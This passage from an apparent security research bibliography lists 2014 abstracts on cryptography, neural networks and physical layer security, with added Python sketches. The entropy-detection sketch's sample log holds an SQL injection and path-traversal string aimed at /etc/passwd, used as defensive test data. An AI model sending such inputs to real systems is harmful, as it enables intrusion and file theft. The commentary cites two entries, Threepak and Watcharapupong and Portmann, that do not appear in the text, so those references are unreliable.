  • Hyunho Kang; Hori, Y.; Katashita, T.; Hagiwara, M.; Iwamura, K., "Cryptographic key generation from PUF data using efficient fuzzy extractors," Advanced Communication Technology (ICACT), 2014 16th International Conference on , vol., no., pp.23,26, 16-19 Feb. 2014. (ID#:14-1695) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6778915&isnumber=6778899 Physical unclonable functions (PUFs) and biometrics are inherently noisy. When used in practice as cryptographic key generators, they need to be combined with an extraction technique to derive reliable bit strings (i.e., a cryptographic key). An approach based on an error correcting code was proposed by Dodis et al. and is known as a fuzzy extractor. However, this method appears to be difficult for non-specialists to implement. In our recent study, we reported the results of some example implementations using PUF data and presented a detailed implementation diagram. In this paper, we describe a more efficient implementation method by replacing the hash function output with the syndrome from the BCH code. The experimental results show that the Hamming distance between two keys varies according to the key size and that information-theoretic security has been achieved. Keywords: Hamming codes; cryptography; error correction codes; fuzzy set theory; BCH code; Hamming distance; PUF data; biometrics; cryptographic key generation; efficient fuzzy extractors; error correcting code; information-theoretic security; physical unclonable functions; reliable bit strings; Cryptography; Data mining; Entropy; Hamming distance; High definition video; Indexes; Reliability; Arbiter PUF; Fuzzy Extractor; Physical Unclonable Functions
  • Joshua D. Guttman, "Establishing and Preserving Protocol Security Goals," Journal of Computer Security - Foundational Aspects of Security, Volume 22 Issue 2, March 2014, (Pages 203-267). (ID#:14-1696) Available at: http://dl.acm.org/citation.cfm?id=2595841.2595843 We take a model-theoretic viewpoint on security goals and how to establish them. The models are possibly fragmentary executions. Security goals such as authentication and confidentiality are geometric sequents, i.e. implications Φ ⇒ Ψ, where Φ and Ψ are built from atomic formulas without negations, implications, or universal quantifiers. Security goals are then statements about homomorphisms, where the source is a minimal fragmentary model of the antecedent Φ. If every homomorphism to a non-fragmentary, complete execution factors through a model in which Ψ is satisfied, then the goal is achieved. One can validate security goals via a process of information enrichment. We call this approach enrich-by-need protocol analysis. This idea also clarifies protocol transformation. A protocol transformation preserves security goals when it preserves the form of the information enrichment process. We formalize this idea using simulation relations between labeled transition systems. These labeled transition systems formalize the analysis of the protocols, i.e. the information enrichment process, not the execution behavior of the protocols. Keywords: Authentication, Cryptographic Protocol Analysis, Security Properties, Strand Spaces
  • Guomin Yang, Chik How Tan, Yi Mu, Willy Susilo, Duncan S. Wong, "Identity Based Identification From Algebraic Coding Theory," Theoretical Computer Science, Volume 520, February 2014, (Pages 51-61). (ID#:14-1697) Available at: http://dl.acm.org/citation.cfm?id=2567013.2567369 or http://dx.doi.org/10.1016/j.tcs.2013.09.008 Cryptographic identification schemes allow a remote user to prove his/her identity to a verifier who holds some public information of the user, such as the user public key or identity. Most of the existing cryptographic identification schemes are based on number-theoretic hard problems such as Discrete Log and Factorization. This paper focuses on the design and analysis of identity based identification (IBI) schemes based on algebraic coding theory. We first revisit an existing code-based IBI scheme which is derived by combining the Courtois-Finiasz-Sendrier signature scheme and the Stern zero-knowledge identification scheme. Previous results have shown that this IBI scheme is secure under passive attacks. In this paper, we prove that the scheme in fact can resist active attacks. However, whether the scheme can be proven secure under concurrent attacks (the most powerful attacks against identification schemes) remains open. In addition, we show that it is difficult to apply the conventional OR-proof approach to this particular IBI scheme in order to obtain concurrent security. We then construct a special OR-proof variant of this scheme and prove that the resulting IBI scheme is secure under concurrent attacks. Keywords: Error-correcting codes, Identification, Identity based cryptography, Syndrome decoding
  • Yi-Kai Liu, "Building One-Time Memories From Isolated Qubits (extended abstract)," Proceedings of the 5th Conference On Innovations In Theoretical Computer Science, January 2014, (Pages 269-286). (ID#:14-1698) Available at: http://dx.doi.org/10.1145/2554797.2554823 One-time memories (OTM's) are simple tamper-resistant cryptographic devices, which can be used to implement one-time programs, a very general form of software protection and program obfuscation. Here we investigate the possibility of building OTM's using quantum mechanical devices. It is known that OTM's cannot exist in a fully-quantum world or in a fully-classical world. Instead, we propose a new model based on isolated qubits - qubits that can only be accessed using local operations and classical communication (LOCC). This model combines a quantum resource (single-qubit measurements) with a classical restriction (on communication between qubits), and can be implemented using current technologies, such as nitrogen vacancy centers in diamond. In this model, we construct OTM's that are information-theoretically secure against one-pass LOCC adversaries that use 2-outcome measurements. Our construction resembles Wiesner's old idea of quantum conjugate coding, implemented using random error-correcting codes; our proof of security uses entropy chaining to bound the supremum of a suitable empirical process. In addition, we conjecture that our random codes can be replaced by some class of efficiently-decodable codes, to get computationally-efficient OTM's that are secure against computationally-bounded LOCC adversaries. In addition, we construct data-hiding states, which allow an LOCC sender to encode an (n-O(1))-bit message into n qubits, such that at most half of the message can be extracted by a one-pass LOCC receiver, but the whole message can be extracted by a general quantum receiver. Keywords: conjugate coding, cryptography, data-hiding states, local operations and classical communication, oblivious transfer, one-time programs, quantum computation
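The entropy-based detection idea in the Threepak and Watcharapupong entry above can be made concrete with a short sketch. The code below is our own illustration, not the authors' implementation: it scores each logged request by its Shannon entropy and flags requests that fall outside a band derived from the mean and standard deviation, in the spirit of the paper's Alpha (AVG-SD) and Beta (AVG-2*SD) boundaries; the paper's exact one-sided flagging rule may differ from the two-sided rule used here.

    import math
    from collections import Counter

    def shannon_entropy(text: str) -> float:
        # Empirical entropy, in bits per character, of one request string.
        counts = Counter(text)
        n = len(text)
        return -sum((c / n) * math.log2(c / n) for c in counts.values())

    def flag_anomalies(requests: list[str]) -> list[str]:
        scores = [shannon_entropy(r) for r in requests]
        avg = sum(scores) / len(scores)
        sd = math.sqrt(sum((s - avg) ** 2 for s in scores) / len(scores))
        # Two-sided simplification of the paper's AVG-SD / AVG-2*SD bands.
        return [r for r, s in zip(requests, scores) if abs(s - avg) > 2 * sd]

    logs = ["GET /index.html HTTP/1.1"] * 8 + [
        "GET /style.css HTTP/1.1",
        "GET /search?q=%27%20OR%201%3D1--&file=../../etc/passwd HTTP/1.1",
    ]
    print(flag_anomalies(logs))  # the URL-encoded injection attempt stands out
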
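Similarly, the key-recycling result in the Portmann entry concerns Wegman-Carter authentication, in which a message is hashed with an almost universal hash family and the tag is encrypted with a one-time pad. The sketch below is our own simplified illustration using a polynomial evaluation hash over a prime field, one standard almost universal family; it shows the structure but is not the construction analyzed in the paper.

    import secrets

    P = (1 << 61) - 1  # a Mersenne prime; hashes and tags live in GF(P)

    def poly_hash(hash_key: int, blocks: list[int]) -> int:
        # Polynomial evaluation hash: an almost universal family keyed by hash_key.
        h = 0
        for b in blocks:  # each block must be an integer in [0, P)
            h = (h * hash_key + b) % P
        return h

    def make_tag(blocks: list[int], hash_key: int, otp: int) -> int:
        # Wegman-Carter: encrypt the hash with a fresh one-time pad value.
        # The pad is consumed per message; the hash key may be reused.
        return (poly_hash(hash_key, blocks) + otp) % P

    hash_key = secrets.randbelow(P)  # long-term, reusable hash key
    otp = secrets.randbelow(P)       # fresh pad for this message only
    msg = [104, 105]                 # message encoded as field elements
    tag = make_tag(msg, hash_key, otp)
    # The receiver, sharing hash_key and otp, recomputes and compares:
    assert tag == (poly_hash(hash_key, msg) + otp) % P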

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Neural Networks

Neural Networks


Artificial neural networks have been used to solve a wide variety of tasks that are hard to solve using ordinary rule-based programming. Much of the interest in neural networks comes from their capacity for learning. Tasks such as function approximation, classification, pattern and sequence recognition, anomaly detection, filtering, clustering, blind source separation, compression, and control all have security implications. The work cited here looks at authentication, the use of learning to develop a hybrid security system, and attack behavior classification in artificial neural networks.
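To make the learning aspect concrete, the short sketch below (ours, for illustration; none of the cited papers uses this exact setup) trains a one-hidden-layer network with plain gradient descent to separate toy "normal" and "attack" feature vectors, the basic pattern underlying the intrusion detection and hybrid security systems cited below.

    import numpy as np

    rng = np.random.default_rng(0)
    # Toy data: 2-D feature vectors labeled 0 (normal) or 1 (attack).
    X = rng.normal(0.0, 1.0, (200, 2))
    y = (X[:, 0] + X[:, 1] > 1.0).astype(float).reshape(-1, 1)

    # One hidden layer of 8 units, sigmoid activations throughout.
    W1 = rng.normal(0, 0.5, (2, 8)); b1 = np.zeros(8)
    W2 = rng.normal(0, 0.5, (8, 1)); b2 = np.zeros(1)
    sigmoid = lambda z: 1.0 / (1.0 + np.exp(-z))

    lr = 0.5
    for _ in range(2000):
        h = sigmoid(X @ W1 + b1)        # forward pass
        p = sigmoid(h @ W2 + b2)
        d2 = (p - y) / len(X)           # backpropagate cross-entropy loss
        dW2 = h.T @ d2; db2 = d2.sum(0)
        d1 = (d2 @ W2.T) * h * (1 - h)
        dW1 = X.T @ d1; db1 = d1.sum(0)
        W2 -= lr * dW2; b2 -= lr * db2  # plain gradient descent step
        W1 -= lr * dW1; b1 -= lr * db1

    print("training accuracy:", float(((p > 0.5) == y).mean()))

Methods such as Levenberg-Marquardt and scaled conjugate gradient, compared in the Kumar, Gupta, and Sehgal entry below, replace the plain descent step with better-conditioned updates but leave this overall structure intact.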

  • Baheti, Ankita; Singh, Lokesh; Khan, Asif Ullah, "Proposed Method for Multimedia Data Security Using Cyclic Elliptic Curve, Chaotic System, and Authentication Using Neural Network," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.664,668, 7-9 April 2014. (ID#:14-1710) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821481&isnumber=6821334 As multimedia applications are used increasingly, the security of images becomes an important issue. The combination of chaos theory and cryptography forms an important field of information security. In the past decade, chaos-based image encryption has received much attention in information security research, and many image encryption algorithms based on chaotic maps have been proposed. Most of them, however, degrade system performance and security and suffer from a small key space. This paper introduces an efficient symmetric encryption scheme based on a cyclic elliptic curve and a chaotic system that can overcome these disadvantages. The cipher encrypts a 256-bit plain image to a 256-bit cipher image within eight 32-bit registers. The scheme generates pseudorandom bit sequences for round keys based on a piecewise nonlinear chaotic map. The generated sequences are then mixed with key sequences derived from the cyclic elliptic curve points. The proposed algorithm has a good encryption effect, a large key space, and high sensitivity to small changes in the secret keys, and is fast compared to other competitive algorithms. Keywords: Authentication; Chaotic communication; Elliptic curves; Encryption; Media; Multimedia communication; authentication; chaos; decryption; encryption; neural network
  • Singh, Nikita; Chandra, Nidhi, "Integrating Machine Learning Techniques to Constitute a Hybrid Security System," Communication Systems and Network Technologies (CSNT), 2014 Fourth International Conference on , vol., no., pp.1082,1087, 7-9 April 2014. (ID#:14-1711) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6821566&isnumber=6821334 Computer security has been discussed and improved in many forms, using different techniques as well as technologies. Enhancements keep being added, as security remains the fastest-updating unit in a computer system. In this paper we propose a model for securing the system along with the network, and enhance it further by applying the machine learning techniques SVM (support vector machine) and ANN (artificial neural network). Both techniques are used together to generate results that are appropriate for analysis purposes and thus prove to be a milestone for security. Keywords: Artificial neural networks; Intrusion detection; Neurons; Probabilistic logic; Support vector machines; Training; Artificial neural network; Host logs; Machine Learning; Network logs; Support vector machine
  • Abdul Razzaq, Khalid Latif, H. Farooq Ahmad, Ali Hur, Zahid Anwar, Peter Charles Bloodsworth, "Semantic Security Against Web Application Attacks," Information Sciences: an International Journal, Volume 254, January 2014. (ID#:14-1712) Available at: http://dl.acm.org/citation.cfm?id=2535053.2535251 This paper proposes an ontology-based method for the detection and identification of web application attacks, including zero day attacks, with few false positives. This ontology-based solution, as opposed to current signature-based methods, classifies web application attacks by employing semantic rules to identify the application context, probable attacks, and protocol used. The rules allow detection of complex variations of web application attacks, as well as provide for a platform and technology independent system. Keywords: Application security, Semantic rule engine, Semantic security
  • Al-Jarrah, Omar; Arafat, Ahmad, "Network Intrusion Detection System Using Attack Behavior Classification," Information and Communication Systems (ICICS), 2014 5th International Conference on , vol., no., pp.1,6, 1-3 April 2014. (ID#:14-1713) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6841978&isnumber=6841931 Intrusion Detection Systems (IDS) have become a necessity in computer security systems because of the increase in unauthorized accesses and attacks. Intrusion detection is a major component in computer security systems and can be classified as Host-based Intrusion Detection System (HIDS), which protects a certain host or system, or Network-based Intrusion Detection System (NIDS), which protects a network of hosts and systems. This paper addresses probe attacks, or reconnaissance attacks, which try to collect any possible relevant information in the network. Network probe attacks have two types: host sweep and port scan attacks. Host sweep attacks determine the hosts that exist in the network, while port scan attacks determine the available services that exist in the network. This paper uses an intelligent system to maximize the recognition rate of network attacks by embedding the temporal behavior of the attacks into a TDNN neural network structure. The proposed system consists of five modules: packet capture engine, preprocessor, pattern recognition, classification, and monitoring and alert module. We have tested the system in a real environment where it has shown good capability in detecting attacks. In addition, the system has been tested using the DARPA 1998 dataset with a 100% recognition rate. In fact, our system can recognize attacks in constant time. Keywords: IP networks; Intrusion detection; Neural networks; Pattern recognition; Ports (Computers); Probes; Protocols; Host sweep; Intrusion Detection Systems; Network probe attack; Port scan; TDNN neural network
  • Singla, P.; Sachdeva, P.; Ahmad, M., "A Chaotic Neural Network Based Cryptographic Pseudo-Random Sequence Design," Advanced Computing & Communication Technologies (ACCT), 2014 Fourth International Conference on , vol., no., pp.301,306, 8-9 Feb. 2014. (ID#:14-1714) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6783468&isnumber=6783406 Efficient random sequence generators are significant in application areas such as cryptographic stream cipher design, statistical sampling and simulation, and direct spread spectrum. A cryptographically efficient pseudo-random sequence should have the characteristics of high randomness and encryption effect. The statistical quality of pseudo-random sequences determines the strength of a cryptographic system, and generating pseudo-random sequences with high randomness and encryption effect is a key challenge. A sequence with poor randomness threatens the security of a cryptographic system. In this paper, the features and strengths of chaos and neural networks are combined to design a novel pseudo-random binary sequence generator for cryptographic applications. The statistical performance of the proposed chaotic neural network based pseudo-random sequence generator is examined against the NIST SP800-22 randomness tests and multimedia image encryption. The results of the investigation are promising and show its relevance for cryptographic applications. (A much-simplified chaotic-map generator sketch appears after this list.) Keywords: chaos; cryptography; neural nets; random sequences; sampling methods; chaotic neural network based cryptographic pseudo-random sequence design; cryptographic stream cipher design; cryptographic system security; cryptographic system strength determination; direct spread spectrum; encryption effect characteristics; high randomness characteristics; statistical sampling; statistical simulation; Biological neural networks; Chaotic communication; Encryption; Generators; Chaotic; cryptography; image encryption; neural network; pseudo-random sequence generator
  • Khatri, P., "Using identity and trust with key management for achieving security in Ad hoc Networks," Advance Computing Conference (IACC), 2014 IEEE International , vol., no., pp.271,275, 21-22 Feb. 2014. (ID#:14-1715) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779333&isnumber=6779283 Communication in a Mobile Ad hoc Network (MANET) is done over a shared wireless channel with no Central Authority (CA) to monitor it; the nodes in the network are held responsible for maintaining the integrity and secrecy of data. To attain the goal of trusted communication in a MANET, many approaches using key management have been implemented. This work proposes a composite identity and trust based model (CIDT) which depends on the public key, physical identity, and trust of a node, and which helps in secure data transfer over wireless channels. CIDT is a modified DSR routing protocol for achieving security. The Trust Factor of a node, along with its key pair and identity, is used to authenticate the node in the network. The experience-based trust factor (TF) of a node is used to decide its authenticity. A valid certificate is generated for an authentic node to carry out communication in the network. The proposed method works well for the self-certification scheme of a node in the network. Keywords: data communication; mobile ad hoc networks; routing protocols; telecommunication security; wireless channels; MANET; ad hoc networks; central authority; data integrity; data secrecy; experience based trust factor; identity model; key management; mobile ad hoc network; modified DSR routing protocol; physical identity; public key; secure data transfer; security; self certification scheme; shared wireless channel; trust factor; trust model; trusted communication; wireless channels; Artificial neural networks; Mobile ad hoc networks; Protocols; Public key; Servers; Certificate; MANET; Public key; Secret key; Trust Model
  • Kumar, D.; Gupta, S.; Sehgal, P., "Comparing gradient based learning methods for optimizing predictive neural networks," Engineering and Computational Sciences (RAECS), 2014 Recent Advances in , vol., no., pp.1,6, 6-8 March 2014. (ID#:14-1716) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6799573&isnumber=6799496 In this paper, we compare the performance of various gradient based techniques in optimizing the neural networks employed for prediction modeling. Training of neural network based predictive models is done using gradient based techniques, which involves searching for the point of minima on a multidimensional energy function by providing step-wise corrective adjustment of the weight vectors present in hidden layers. Convergence of different gradient techniques is studied and compared by performing experiments in the neural network toolbox package of MATLAB. Bulky data sets extracted from a live data warehouse of the life insurance sector are employed with gradient methods for developing the predictive models. Convergence behaviors of the learning methods - gradient descent method, Levenberg Marquardt method, conjugate gradient method and scaled conjugate gradient method - have been observed. Keywords: conjugate gradient methods; data warehouses; learning (artificial intelligence); neural nets; Levenberg Marquardt method; MATLAB; bulky data sets; convergence behavior; gradient based learning method; gradient based techniques; gradient descent method; gradient techniques; life insurance sector; live data warehouse; multidimensional energy function; neural network based predictive models; neural network toolbox package; prediction modeling; predictive neural networks; scaled conjugate gradient method; step-wise corrective adjustment; weight vector; Convergence; Gradient methods; Neural networks; Neurons; Predictive models; Training; Vectors; conjugate gradient; gradient methods; learning algorithms; neural networks; nonlinear optimization
  • Zhang, H.; Wang, Z.; Liu, D., "A Comprehensive Review of Stability Analysis of Continuous-Time Recurrent Neural Networks," Neural Networks and Learning Systems, IEEE Transactions on , vol.25, no.7, pp.1229,1262, July 2014. (ID#:14-1717) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6814892&isnumber=6828828 Stability problems of continuous-time recurrent neural networks have been extensively studied, and many papers have been published in the literature. The purpose of this paper is to provide a comprehensive review of the research on stability of continuous-time recurrent neural networks, including Hopfield neural networks, Cohen-Grossberg neural networks, and related models. Since time delay is inevitable in practice, stability results of recurrent neural networks with different classes of time delays are reviewed in detail. For the case of delay-dependent stability, the results on how to deal with the constant/variable delay in recurrent neural networks are summarized. The relationship among stability results in different forms, such as algebraic inequality forms, M-matrix forms, linear matrix inequality forms, and Lyapunov diagonal stability forms, is discussed and compared. Some necessary and sufficient stability conditions for recurrent neural networks without time delays are also discussed. Concluding remarks and future directions of stability analysis of recurrent neural networks are given. Keywords: Biological neural networks; Delays; Neurons; Recurrent neural networks; Stability criteria; M-matrix; Cohen-Grossberg neural networks; Hopfield neural networks; Lyapunov diagonal stability (LDS); discrete delay; distributed delays; linear matrix inequality (LMI); recurrent neural networks; robust stability; stability
  • Yu Wang; Boxun Li; Rong Luo; Yiran Chen; Ningyi Xu; Huazhong Yang, "Energy efficient neural networks for big data analytics," Design, Automation and Test in Europe Conference and Exhibition (DATE), 2014 , vol., no., pp.1,2, 24-28 March 2014. (ID#:14-1718) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6800559&isnumber=6800201 The world is experiencing a data revolution to discover knowledge in big data. Large scale neural networks are one of the mainstream tools of big data analytics. Processing big data with large scale neural networks includes two phases: the training phase and the operation phase. Huge computing power is required to support the training phase. And the energy efficiency (power efficiency) is one of the major considerations of the operation phase. We first explore the computing power of GPUs for big data analytics and demonstrate an efficient GPU implementation of the training phase of large scale recurrent neural networks (RNNs). We then introduce a promising ultrahigh energy efficient implementation of neural networks' operation phase by taking advantage of the emerging memristor technique. Experimental results show that the proposed GPU implementation of RNNs is able to achieve 2 ~ 11x speed-up compared with the basic CPU implementation. And the scaled-up recurrent neural network trained with GPUs realizes an accuracy of 47% on the Microsoft Research Sentence Completion Challenge, the best result achieved by a single RNN on the same dataset. In addition, the proposed memristor-based implementation of neural networks demonstrates power efficiency of > 400 GFLOPS/W and achieves energy savings of 22x on the HMAX model compared with its pure digital implementation counterpart. Keywords: data analysis; electronic engineering computing; graphics processing units; memristors; recurrent neural nets; CPU implementation; GPU implementation; HMAX model; RNNs; big data analytics; energy efficient neural networks; large scale recurrent neural networks; memristor technique; neural networks operation phase; neural networks training phase; power efficiency; Data handling; Data storage systems; Information management; Memristors; Recurrent neural networks; Training
  • Rakkiyappan, R.; Cao, J.; Velmurugan, G., "Existence and Uniform Stability Analysis of Fractional-Order Complex-Valued Neural Networks With Time Delays," Neural Networks and Learning Systems, IEEE Transactions on, vol. PP, no.99, pp.1,1, March 2014. (ID#:14-1719) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781037&isnumber=6104215 This paper deals with the problem of existence and uniform stability analysis of fractional-order complex-valued neural networks with constant time delays. Complex-valued recurrent neural networks are an extension of real-valued recurrent neural networks that include complex-valued states, connection weights, or activation functions. This paper gives sufficient conditions for the existence and uniform stability of such networks. Three numerical simulations are delineated to substantiate the effectiveness of the theoretical results. Keywords: Artificial neural networks; Biological neural networks; Delay effects; Mathematics; Recurrent neural networks; Stability analysis; Banach contraction fixed point theorem; complex-valued neural networks; fractional order; time delays
  • Alfaro-Ponce, M.; Arguelles Cruz, A.; Chairez, I., "Adaptive Identifier for Uncertain Complex Nonlinear Systems Based on Continuous Neural Networks," Neural Networks and Learning Systems, IEEE Transactions on , vol.25, no.3, pp.483,494, March 2014. (ID#:14-1720) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6585821&isnumber=6740874 This paper presents the design of a complex-valued differential neural network identifier for uncertain nonlinear systems defined in the complex domain. This design includes the construction of an adaptive algorithm to adjust the parameters included in the identifier. The algorithm is obtained based on a special class of controlled Lyapunov functions. The quality of the identification process is characterized using the practical stability framework. Indeed, the region where the identification error converges is derived by the same Lyapunov method. This zone is defined by the power of uncertainties and perturbations affecting the complex-valued uncertain dynamics. Moreover, this convergence zone is reduced to its lowest possible value using ideas related to the so-called ellipsoid methodology. Two simple but informative numerical examples are developed to show how the identifier proposed in this paper can be used to approximate uncertain nonlinear systems valued in the complex domain. Keywords: Lyapunov methods; identification; neural nets; nonlinear systems; uncertain systems; Lyapunov method; adaptive algorithm; adaptive identifier; approximate uncertain nonlinear systems; complex domain; complex valued differential neural network identifier; complex-valued uncertain dynamics; continuous neural networks; controlled Lyapunov functions; convergence zone; ellipsoid methodology; identification error; identification process; practical stability framework; uncertain complex nonlinear systems; Artificial neural networks; Biological neural networks; Least squares approximations; Lyapunov methods; Nonlinear systems; Training; Complex-valued neural networks; continuous neural network; controlled Lyapunov function; nonparametric identifier
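The chaos-based generator in the Singla, Sachdeva, and Ahmad entry above pairs a chaotic map with a neural network. As a much-simplified stand-in, the sketch below draws bits from the classic logistic map; it is our own illustration of the general idea, not the paper's construction, and is emphatically not cryptographically secure on its own.

    def logistic_map_bits(x0: float = 0.61, r: float = 3.99,
                          n_bits: int = 256, burn_in: int = 1000) -> list[int]:
        # Iterate x -> r*x*(1-x) in the chaotic regime (r close to 4).
        x = x0
        for _ in range(burn_in):  # discard the initial transient
            x = r * x * (1 - x)
        bits = []
        for _ in range(n_bits):
            x = r * x * (1 - x)
            bits.append(1 if x > 0.5 else 0)  # threshold the orbit into bits
        return bits

    print(logistic_map_bits(n_bits=32))

Practical designs whiten such sequences, combine multiple maps or a neural network, and validate the output against batteries such as NIST SP800-22, as the cited paper does.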

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Physical Layer Security

Physical Layer Security


Physical layer security provides the theoretical foundation for a new model of secure communications that exploits the noise inherent in communications channels. Grounded in the information-theoretic limits of secure communication at the physical layer, the concept presents both challenges and opportunities for the design of physical layer security schemes. The works presented here address the information-theoretic underpinnings of physical layer security and present various approaches and outcomes for communications systems.
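The central quantity in much of this literature is the secrecy capacity: for a Gaussian wiretap channel it is the gap between the main channel's capacity and the eavesdropper's, floored at zero. The short Python sketch below (ours, for orientation; the parameter values are arbitrary) computes it directly.

    import math

    def awgn_capacity(snr_linear: float) -> float:
        # Shannon capacity of an AWGN channel, in bits per channel use.
        return math.log2(1.0 + snr_linear)

    def secrecy_capacity(snr_main_db: float, snr_eve_db: float) -> float:
        # Gaussian wiretap channel: C_s = max(0, C_main - C_eve).
        c_main = awgn_capacity(10 ** (snr_main_db / 10))
        c_eve = awgn_capacity(10 ** (snr_eve_db / 10))
        return max(0.0, c_main - c_eve)

    # A legitimate link at 15 dB against an eavesdropper at 5 dB:
    print(round(secrecy_capacity(15.0, 5.0), 2), "bits/channel use")

Every positive-secrecy scheme surveyed below can be read as a way of widening this gap: better antennas and combining raise the main channel's capacity, while artificial noise and jamming lower the eavesdropper's.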

  • Rajeev Singh, Teek Parval Sharma, "A Key Hiding Communication Scheme for Enhancing the Wireless LAN Security," Wireless Personal Communications: An International Journal, Volume 77 Issue 2, July 2014, (Pages 1145-1165). (ID#:14-1721) Available at: http://dx.doi.org/10.1007/s11277-013-1559-0 Per-frame authentication and symmetric key based encryption are implicit necessities for security in Wireless Local Area Networks (LANs). We propose a novel symmetric key based secure WLAN communication scheme. The scheme provides authentication per frame, generates a new secret key for the encryption of each frame, and involves fewer message exchanges for maintaining the freshness of the key and initial vector (IV). It enhances wireless security by utilizing a key hiding concept for sharing the symmetric secret key and IV. The shared secret encryption key and IV are protected using counters and then mixed with each other before sending. We prove the security of the scheme in the Canetti-Krawczyk model. Keywords: Authentication, SK-secure protocol, Symmetric key encryption, Wireless security, physical layer security
  • Mukherjee, A.; Fakoorian, S.; Huang, J.; Swindlehurst, A., "Principles of Physical Layer Security in Multiuser Wireless Networks: A Survey," Communications Surveys & Tutorials, IEEE, vol. PP, no.99, pp.1, 24, February 2014. (ID#:14-1722) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6739367&isnumber=5451756 This paper provides a comprehensive review of the domain of physical layer security in multiuser wireless networks. The essential premise of physical layer security is to enable the exchange of confidential messages over a wireless medium in the presence of unauthorized eavesdroppers, without relying on higher-layer encryption. This can be achieved primarily in two ways: without the need for a secret key by intelligently designing transmit coding strategies, or by exploiting the wireless communication medium to develop secret keys over public channels. The survey begins with an overview of the foundations dating back to the pioneering work of Shannon and Wyner on information-theoretic security. We then describe the evolution of secure transmission strategies from point-to-point channels to multiple-antenna systems, followed by generalizations to multiuser broadcast, multiple-access, interference, and relay networks. Secret-key generation and establishment protocols based on physical layer mechanisms are subsequently covered. Approaches for secrecy based on channel coding design are then examined, along with a description of inter-disciplinary approaches based on game theory and stochastic geometry. The associated problem of physical layer message authentication is also briefly introduced. The survey concludes with observations on potential research directions in this area. Keywords: Information-theoretic security; Physical layer security; artificial noise; cooperative jamming; secrecy; secret-key agreement; wiretap channel
  • Saad, Walid; Zhou, Xiangyun; Han, Zhu; Poor, H.Vincent, "On the Physical Layer Security of Backscatter Wireless Systems," Wireless Communications, IEEE Transactions on , vol.13, no.6, pp.3442,3451, June 2014. (ID#:14-1723) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6836141&isnumber=6836134 Backscatter wireless communication lies at the heart of many practical low-cost, low-power, distributed passive sensing systems. The inherent cost restrictions coupled with the modest computational and storage capabilities of passive sensors, such as RFID tags, render the adoption of classical security techniques challenging, which motivates the introduction of physical layer security approaches. Despite their promising potential, little has been done to study the prospective benefits of such physical layer techniques in backscatter systems. In this paper, the physical layer security of wireless backscatter systems is studied and analyzed. First, the secrecy rate of a basic single-reader, single-tag model is studied. Then, the unique features of the backscatter channel are exploited to maximize this secrecy rate. In particular, the proposed approach allows a backscatter system's reader to inject a noise-like signal, added to the conventional continuous wave signal, in order to interfere with an eavesdropper's reception of the tag's information signal. The benefits of this approach are studied for a variety of scenarios while assessing the impact of key factors, such as antenna gains and location of the eavesdropper, on the overall secrecy of the backscatter transmission. Numerical results corroborate our analytical insights and show that, if properly deployed, the injection of artificial noise yields significant performance gains in terms of improving the secrecy of backscatter wireless transmission. Keywords: Backscatter; Communication system security; Noise; Physical layer; Security; Wireless communication; Wireless sensor networks; Secrecy rate; artificial noise; backscatter communication; physical layer security
  • Lifeng Wang; Nan Yang; Elkashlan, M.; Phee Lep Yeoh; Jinhong Yuan, "Physical Layer Security of Maximal Ratio Combining in Two-Wave With Diffuse Power Fading Channels," Information Forensics and Security, IEEE Transactions on , vol.9, no.2, pp.247,258, Feb. 2014. (ID#:14-1724) Available at: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6698305&isnumber=6705647 This paper advocates physical layer security of maximal ratio combining (MRC) in wiretap two-wave with diffuse power fading channels. In such a wiretap channel, we consider that confidential messages transmitted from a single antenna transmitter to an M-antenna receiver are overheard by an N-antenna eavesdropper. The receiver adopts MRC to maximize the probability of secure transmission, whereas the eavesdropper adopts MRC to maximize the probability of successful eavesdropping. We derive the secrecy performance for two practical scenarios: 1) the eavesdropper's channel state information (CSI) is available at the transmitter and 2) the eavesdropper's CSI is not available at the transmitter. For the first scenario, we develop a new analytical framework to characterize the average secrecy capacity as the principal security performance metric. Specifically, we derive new closed-form expressions for the exact and asymptotic average secrecy capacity. Based on these, we determine the high signal-to-noise ratio power offset to explicitly quantify the impacts of the main channel and the eavesdropper's channel on the average secrecy capacity. For the second scenario, the secrecy outage probability is the primary security performance metric. Here, we derive new closed-form expressions for the exact and asymptotic secrecy outage probability. We also derive the probability of nonzero secrecy capacity. The asymptotic secrecy outage probability explicitly indicates that the positive impact of M is reflected in the secrecy diversity order and the negative impact of N is reflected in the secrecy array gain. Motivated by this, we examine the performance gap between N and N+1 antennas based on their respective secrecy array gains. Keywords: diversity reception; fading channels; telecommunication security; antenna transmitter; asymptotic average secrecy capacity; asymptotic secrecy outage probability; closed form expression; diffuse power fading channel; eavesdropper channel state information; exact secrecy outage probability; maximal ratio combining; nonzero secrecy; physical layer security; wiretap channel; wiretap two-wave communication; Antennas; Fading; Physical layer; Receivers; Security; Signal to noise ratio; Transmitters; Physical layer security; average secrecy capacity; maximal ratio combining; secrecy outage probability; two-wave with diffuse power fading
